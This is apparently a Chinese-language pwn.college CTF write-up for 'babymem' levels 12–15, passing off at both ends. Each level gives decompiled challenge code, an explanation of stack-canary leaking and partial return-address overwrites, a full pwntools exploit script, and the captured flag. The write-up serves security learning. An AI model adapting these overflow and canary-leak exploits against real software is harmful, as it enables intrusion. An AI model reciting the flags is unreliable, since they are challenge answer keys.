  __int64 v6; // [rsp+0h] [rbp-60h] BYREF
  __int64 v7; // [rsp+8h] [rbp-58h]
  __int64 v8; // [rsp+10h] [rbp-50h]
  unsigned int v9; // [rsp+1Ch] [rbp-44h]
  int v10; // [rsp+2Ch] [rbp-34h]
  size_t nbytes; // [rsp+30h] [rbp-30h] BYREF
  void *buf; // [rsp+38h] [rbp-28h]
  _QWORD v13[2]; // [rsp+40h] [rbp-20h] BYREF
  char v14; // [rsp+50h] [rbp-10h]
  unsigned __int64 v15; // [rsp+58h] [rbp-8h]
  __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+68h] [rbp+8h] BYREF

  v9 = a1;
  v8 = a2;
  v7 = a3;
  v15 = __readfsqword(0x28u);
  v13[0] = 0LL;
  v13[1] = 0LL;
  v14 = 0;
  buf = v13;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)&v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 17);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is no \"win\" variable.");
  puts("You will need to force the program to execute the win_authed() function");
  puts("by directly overflowing into the stored return address back to main,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_DWORD)buf + 8,
    17);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 17);
  puts("and 8 that will overwrite the return address).\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  puts("Because the binary is position independent, you cannot know");
  puts("exactly where the win_authed() function is located.");
  puts("This means that it is not clear what should be written into the return address.\n");
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 17);
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
  puts("Overwriting the entire return address is fine when we know");
  puts("the whole address, but here, we only really know the last three nibbles.");
  puts("These nibbles never change, because pages are aligned to 0x1000.");
  puts("This gives us a workaround: we can overwrite the least significant byte");
  puts("of the saved return address, which we can know from debugging the binary,");
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
  puts("Since that last byte will be constant between executions (due to page alignment),");
  puts("this will always work.");
  puts("If the address we want to redirect execution to is a bit farther away from");
  puts("the saved return address, and we need to write two bytes, then one of those");
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
  puts("incorrect 15 of 16 times.");
  puts("This is okay: we can just run our exploit a few times until it works");
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
  puts("it only lets you win if you provide it with the argument 0x1337.");
  puts("Speifically, the win_authed() function looks something like:");
  puts("    void win_authed(int token)");
  puts("    {");
  puts("      if (token != 0x1337) return;");
  puts("      puts(\"You win! Here is your flag: \");");
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
  puts("      puts(\"\");");
  puts("    }");
  puts(byte_3E5B);
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
  puts("but for now, we will simply bypass it! You can overwrite the return address");
  puts("with *any* value (as long as it points to executable code), not just the start");
  puts("of functions. Let's overwrite past the token check in win!\n");
  puts("To do this, we will need to analyze the program with objdump, identify where");
  puts("the check is in the win_authed() function, find the address right after the check,");
  puts("and write that address over the saved return address.\n");
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
  printf(
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  puts("with the correct value.\n");
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v10 = read(0, buf, nbytes);
  if ( v10 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v10);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  printf("- the address of win_authed() is %p.\n", win_authed);
  putchar(10);
  puts("If you have managed to overwrite the return address with the correct value,");
  puts("challenge() will jump straight to win_authed() when it returns.");
  printf("Let's try it now!\n\n");
  if ( (unsigned __int64)buf + v10 > rp_ + 2 )
  {
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
    puts("         This can still work, because I told you the correct address to use for");
    puts("         this execution, but you should not rely on that information.");
    puts("         You can solve this challenge by only overwriting two bytes!");
    puts("         ");
  }
  printf("You said: %s\n", (const char *)buf);
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
  puts("call to see the hidden backdoor!");
  if ( strstr((const char *)buf, "REPEAT") )
  {
    puts("Backdoor triggered! Repeating challenge()");
    return challenge(v9, v8, v7);
  }
  else
  {
    puts("Goodbye!");
    return 0LL;
  }
}

虽说是一道蛮综合的题，不过我感觉不算难，就简单说说思路好了。这个程序的问题就在于我们可以提供任意输入溢出 buf，覆盖返回地址。但是这里有一个 canary 保护需要绕过。

我们注意到有一条 printf 会输出我们栈上的内容，那我们是不是可以填满整个 buf，直到 canary 为止？这样 printf 就会把 canary 泄漏出来。结合 printf 判断字符串结束的机制，以及 canary 固定以 \x00 结尾，我们需要用一个任意字符填上这个空，这样就把 canary 泄漏出来了。

strstr 函数的定义如下，它会从 haystack 中搜索 needle 第一次出现的位置，返回这个位置的指针。如果没匹配到，则返回 NULL。

// attributes: thunk
char *strstr(const char *haystack, const char *needle)
{
  return strstr(haystack, needle);
}

对于这个函数最好还知道：

如果 needle 是空字符串，则 strstr 总是返回 haystack 的指针。

strstr 是大小写敏感的，strcasestr 大小写不敏感。

还有 strchr 返回字符串中第一个匹配的字符的指针。memcmp 比较指定内存区域的内容，适用于更通用的场景，strstr 则是处理简单字符串匹配问题的实用工具，适用于无需高性能优化的场景。

说这些只是我觉得了解下说不定会有帮助，要是哪天比赛碰上了，到时候能不能查还说不准…… ~（想起了乔布斯说的：美妙人生，把点连成线）~

~好吧，其实主要是 ChatGPT 都说了，那我可不得好好利用一下，啰嗦两句？xD~

if ( strstr((const char *)buf, "REPEAT") ) 判断输入中是否包含 REPEAT，如果包含的话就会再次调用 challenge。因为是同一个进程再次调用 challenge，所以 canary 的值不会改变，这就让我们泄漏出来的 canary 派上用场了。

绕过这个 win_authed 检测没啥好说的了吧，返回地址重定位到内部代码块开始执行即可。

void __fastcall win_authed(int a1)
{
  int *v1; // rax
  char *v2; // rax
  int *v3; // rax
  char *v4; // rax

  if ( a1 == 4919 )
  {
    puts("You win! Here is your flag:");
    flag_fd_5715 = open("/flag", 0);
    if ( flag_fd_5715 < 0 )
    {
      v1 = __errno_location();
      v2 = strerror(*v1);
      printf("\n  ERROR: Failed to open the flag -- %s!\n", v2);
      if ( geteuid() )
      {
        puts("  Your effective user id is not 0!");
        puts("  You must directly run the suid binary in order to have the correct permissions!");
      }
      exit(-1);
    }
    flag_length_5716 = read(flag_fd_5715, &flag_5714, 0x100uLL);
    if ( flag_length_5716 <= 0 )
    {
      v3 = __errno_location();
      v4 = strerror(*v3);
      printf("\n  ERROR: Failed to read the flag -- %s!\n", v4);
      exit(-1);
    }
    write(1, &flag_5714, flag_length_5716);
    puts("\n");
  }
}

当时这题困扰住我的倒不是如何构造攻击链的问题，而是写 exp 的问题……脑子抽了企图在 return challenge(v9, v8, v7); 这里返回到 win_authed，但是这是写死在代码段的，而且权限是 r-xp，小小栈溢出岂能覆盖？后来发现整体思路还少了一步，应该是先触发一次后门泄漏 canary，然后第二次执行的时候就不需要触发后门了，直接覆盖 challenge 的返回地址就好了。

随便扯两句心里话吧。踩了不少坑，希望以后可以争取做到更严谨完善的分析。还有就是动态调试很重要哦～感觉自己多少还是有一点调试恐惧症 LMAO

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, random, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-12-0"
HOST, PORT = "pwn.college", 1337

gdbscript = """
b *challenge+1339
b *challenge+1821
c
"""


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


backdoor = b"REPEAT "
backdoor_trigger = b"".ljust(0x12, b"A") + backdoor
padding_to_canary = b"".ljust(0x18, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = b"\xe0"
possible_bytes = [bytes([i]) for i in range(0x03, 0x103, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_canary(target):
    try:
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        log.success(f"Canary: {to_hex_bytes(canary)}")

        return canary
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary = leak_canary(target)

    payload = padding_to_canary
    payload += canary
    payload += padding_to_ret
    payload += fixed_offset + random.choice(possible_bytes)

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall()

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        target = launch()

        try:
            payload = construct_payload(target)

            if attack(target, payload):
                log.success("Success! Exiting...")

                pause()
                exit()
            else:
                target.close()
                target = launch()
        except Exception as e:
            log.exception(f"An error occurred in main loop: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{YkuEQhg7aejOObKgMu4MNlIgI-S.0VMxMDL5cTNxgzW}

Level 12.1

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a bug left in the binary.

Write-up

和上题一样啊，不说了。

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, random, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-12-1"
HOST, PORT = "pwn.college", 1337

gdbscript = """
b *challenge+298
c
"""


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


backdoor = b"REPEAT "
backdoor_trigger = b"".ljust(0x82, b"A") + backdoor
padding_to_canary = b"".ljust(0x88, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = b"\xcd"
possible_bytes = [bytes([i]) for i in range(0x03, 0x103, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_canary(target):
    try:
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        log.success(f"Canary: {to_hex_bytes(canary)}")

        return canary
    except Exception as e:
log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary = leak_canary(target)

    payload = padding_to_canary
    payload += canary
    payload += padding_to_ret
    payload += fixed_offset + random.choice(possible_bytes)

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall()

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        target = launch()

        try:
            payload = construct_payload(target)

            if attack(target, payload):
                log.success("Success! Exiting...")

                pause()
                exit()
            else:
                target.close()
                target = launch()
        except Exception as e:
            log.exception(f"An error occurred in main loop: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Q8RGfsaRLXQyi0mLIgR3c7-_jYK.0lMxMDL5cTNxgzW}

Level 13.0

Information

Category: Pwn

Description

Leak data left behind unintentionally by utilizing clever payload construction.

Write-up

int verify_flag()
{
  int v0; // eax
  _BYTE v2[279]; // [rsp+79h] [rbp-117h] BYREF

  *(_QWORD *)&v2[271] = __readfsqword(0x28u);
  v0 = open("/flag", 0);
  read(v0, v2, 0x100uLL);
  puts(
    "This challenge reads the flag file to verify it. Do you think this might leave traces of the flag around afterwards?\n");
  return printf("The flag was read into address %p.\n\n", v2);
}

这题没啥好说的吧，完全就是 verify_flag 把 flag 读到栈上了，然后我们用垃圾数据填充到 flag 头就好了，printf("You said: %.360s\n", (const char *)buf); 会输出一切……

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-13-0"
HOST, PORT = "pwn.college", 1337

gdbscript = """
b *verify_flag+75
b *challenge+1429
b *challenge+1932
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding_to_flag = b"".ljust(0x59, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    payload = padding_to_flag

    return payload


def leak_flag(target, payload):
    try:
        send_payload(target, payload)

        target.recvuntil(b"pwn.college{")

        flag = b"pwn.college{" + target.recvuntil(b"}")

        log.success(f"Flag successfully leaked: {flag}")
    except Exception as e:
        log.exception(f"An error occurred while performing leak_flag: {e}")


def main():
    target = launch(debug=False)

    payload = construct_payload()

    leak_flag(target, payload)


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{YkKrgg8qd3Vyt4OOrpBqwsAEJ2g.01MxMDL5cTNxgzW}

Level 13.1

Information

Category: Pwn

Description

Leak data left behind unintentionally by utilizing clever payload construction.

Write-up

和上题一样，重新计算一下偏移就好了。

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-13-1"
HOST, PORT = "pwn.college", 1337

gdbscript = """
b *verify_flag+75
b *challenge+168
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding_to_flag = b"".ljust(0x8A, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    payload = padding_to_flag

    return payload


def leak_flag(target, payload):
    try:
        send_payload(target, payload)

        target.recvuntil(b"pwn.college{")

        flag = b"pwn.college{" + target.recvuntil(b"}")

        log.success(f"Flag successfully leaked: {flag}")
    except Exception as e:
        log.exception(f"An error occurred while performing leak_flag: {e}")


def main():
    target = launch(debug=False)

    payload = construct_payload()

    leak_flag(target, payload)


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{gscSxVngZ4uaJ8tU3A-fhqwrLIM.0FNxMDL5cTNxgzW}

Level 14.0

Information

Category: Pwn

Description

Leak data left behind unintentionally to defeat a stack canary in a PIE binary.

Write-up

__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  __int64 v6; // [rsp+0h] [rbp-1E0h] BYREF
  __int64 v7; // [rsp+8h] [rbp-1D8h]
  __int64 v8; // [rsp+10h] [rbp-1D0h]
  unsigned int v9; // [rsp+1Ch] [rbp-1C4h]
  int v10; // [rsp+2Ch] [rbp-1B4h]
  size_t nbytes; // [rsp+30h] [rbp-1B0h] BYREF
  void *buf; // [rsp+38h] [rbp-1A8h]
  char v13; // [rsp+40h] [rbp-1A0h] BYREF
  unsigned __int64 v14; // [rsp+1D8h] [rbp-8h]
  __int64 savedregs; // [rsp+1E0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+1E8h] [rbp+8h] BYREF

  v9 = a1;
  v8 = a2;
  v7 = a3;
  v14 = __readfsqword(0x28u);
  buf = &v13;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  puts("However... An important initialization step was missed.");
  puts("Use this to your advantage!");
  puts(byte_3284);
  sp_ = (__int64)&v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 407);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is no \"win\" variable.");
  puts("You will need to force the program to execute the win_authed() function");
  puts("by directly overflowing into the stored return address back to main,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_DWORD)buf + 8,
    407);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 407);
  puts("and 8 that will overwrite the return address).\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  puts("Because the binary is position independent, you cannot know");
  puts("exactly where the win_authed() function is located.");
  puts("This means that it is not clear what should be written into the return address.\n");
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 407);
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
  puts("Overwriting the entire return address is fine when we know");
  puts("the whole address, but here, we only really know the last three nibbles.");
  puts("These nibbles never change, because pages are aligned to 0x1000.");
  puts("This gives us a workaround: we can overwrite the least significant byte");
  puts("of the saved return address, which we can know from debugging the binary,");
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
  puts("Since that last byte will be constant between executions (due to page alignment),");
  puts("this will always work.");
  puts("If the address we want to redirect execution to is a bit farther away from");
  puts("the saved return address, and we need to write two bytes, then one of those");
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
  puts("incorrect 15 of 16 times.");
  puts("This is okay: we can just run our exploit a few times until it works");
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
  puts("it only lets you win if you provide it with the argument 0x1337.");
  puts("Speifically, the win_authed() function looks something like:");
  puts("    void win_authed(int token)");
  puts("    {");
  puts("      if (token != 0x1337) return;");
  puts("      puts(\"You win! Here is your flag: \");");
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
  puts("      puts(\"\");");
  puts("    }");
  puts(byte_3284);
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
  puts("but for now, we will simply bypass it! You can overwrite the return address");
  puts("with *any* value (as long as it points to executable code), not just the start");
  puts("of functions. Let's overwrite past the token check in win!\n");
  puts("To do this, we will need to analyze the program with objdump, identify where");
  puts("the check is in the win_authed() function, find the address right after the check,");
  puts("and write that address over the saved return address.\n");
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
  printf(
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  puts("with the correct value.\n");
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v10 = read(0, buf, nbytes);
  if ( v10 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v10);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  printf("- the address of win_authed() is %p.\n", win_authed);
  putchar(10);
  puts("If you have managed to overwrite the return address with the correct value,");
  puts("challenge() will jump straight to win_authed() when it returns.");
  printf("Let's try it now!\n\n");
  if ( (unsigned __int64)buf + v10 > rp_ + 2 )
  {
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
    puts("         This can still work, because I told you the correct address to use for");
    puts("         this execution, but you should not rely on that information.");
    puts("         You can solve this challenge by only overwriting two bytes!");
    puts("         ");
  }
  printf("You said: %.407s\n", (const char *)buf);
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
  puts("call to see the hidden backdoor!");
  if ( strstr((const char *)buf, "REPEAT") )
  {
    puts("Backdoor triggered! Repeating challenge()");
    return challenge(v9, v8, v7);
  }
  else
  {
    puts("Goodbye!");
    return 0LL;
  }
}

这题就是前面几个 level 的结合体。唯一的不同之处在于，这次 canary 和其它一些数据以残留数据的形式出现在 challenge 创建的栈帧内部，我们只要把这个残留的 canary 泄漏出来就好了。至于 challenge 本身的 canary，我们泄漏不了。所以其实出题人的本意就是想让我们泄漏栈上的残留数据，为此对泄漏 challenge 原本的 canary 的途径做了限制。

至于我是如何发现残留数据这一事实的，是通过动态调试，凭借对 canary 敏锐的洞察力发现的 LMAO。咱就是说对数据的敏感度也很重要哦～

为了避免这种残留数据/栈帧复用的问题，我们每次分配完栈空间后都应该通过类似 memset 的方法清空栈内容才对。所以，如果没有 memset 的，就可以想想会不会有泄漏残留数据的可能了。

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, random, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-14-0"
HOST, PORT = "pwn.college", 1337

gdbscript = """
c
"""


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


backdoor = b"REPEAT "
backdoor_trigger = b"".ljust(0x82, b"A") + backdoor
padding_to_canary = b"".ljust(0x198, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = b"\xd4"
possible_bytes = [bytes([i]) for i in range(0xF, 0x10F, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_canary(target):
    try:
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        log.success(f"Canary: {to_hex_bytes(canary)}")

        return canary
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary = leak_canary(target)

    payload = padding_to_canary
    payload += canary
    payload += padding_to_ret
    payload += fixed_offset + random.choice(possible_bytes)

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred while performing leak_flag: {e}")


def main():
    while True:
        target = launch(debug=False)

        try:
            payload = construct_payload(target)

            if attack(target, payload):
                log.success("Success! Exiting...")

                pause()
                exit()
            else:
                target.close()
                target = launch()
        except Exception as e:
            log.exception(f"An error occurred in main loop: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{chm7VMiV6dZ3oBKDhVUhtvXg3kb.0VNxMDL5cTNxgzW}

Level 14.1

Information

Category: Pwn

Description

Leak data left behind unintentionally to defeat a stack canary in a PIE binary.

Write-up

和上题一样，重新找一下偏移和返回地址就好啦。

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, random, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-14-1"
HOST, PORT = "pwn.college", 1337

gdbscript = """
b *challenge+168
c
"""


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


backdoor = b"REPEAT "
backdoor_trigger = b"".ljust(0x72, b"A") + backdoor
padding_to_canary = b"".ljust(0x188, b"A")
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = b"\x7d"
possible_bytes = [bytes([i]) for i in range(0x8, 0x108, 0x10)]


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()

        target.sendlineafter(b"Payload size: ", payload_size)
        target.sendafter(b"Send your payload", payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_canary(target):
    try:
        send_payload(target, backdoor_trigger)
        target.recvuntil(backdoor)

        canary = b"\x00" + target.recv(0x7)
        log.success(f"Canary: {to_hex_bytes(canary)}")

        return canary
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary = leak_canary(target)

    payload = padding_to_canary
    payload += canary
    payload += padding_to_ret
    payload += fixed_offset + random.choice(possible_bytes)

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred while performing leak_flag: {e}")


def main():
    while True:
        target = launch(debug=False)

        try:
            payload = construct_payload(target)

            if attack(target, payload):
                log.success("Success! Exiting...")

                pause()
                exit()
            else:
                target.close()
                target = launch()
        except Exception as e:
            log.exception(f"An error occurred in main loop: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{E_7686TOh__Z7NZeXfOPaMP5YfJ.0lNxMDL5cTNxgzW}

Level 15.0

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a network-style fork server in the target binary.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int optval; // [rsp+24h] [rbp-101Ch] BYREF
  int fd; // [rsp+28h] [rbp-1018h]
  int v7; // [rsp+2Ch] [rbp-1014h]
  sockaddr addr; // [rsp+30h] [rbp-1010h] BYREF
  unsigned __int64 v9; // [rsp+1038h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts("This challenge is listening for connections on TCP port 1337.\n");
  puts("The challenge supports unlimited sequential connections.\n");
  fd = socket(2, 1, 0);
  optval = 1;
  setsockopt(fd, 1, 2, &optval, 4u);
  addr.sa_family = 2;
  *(_DWORD *)&addr.sa_data[2] = 0;
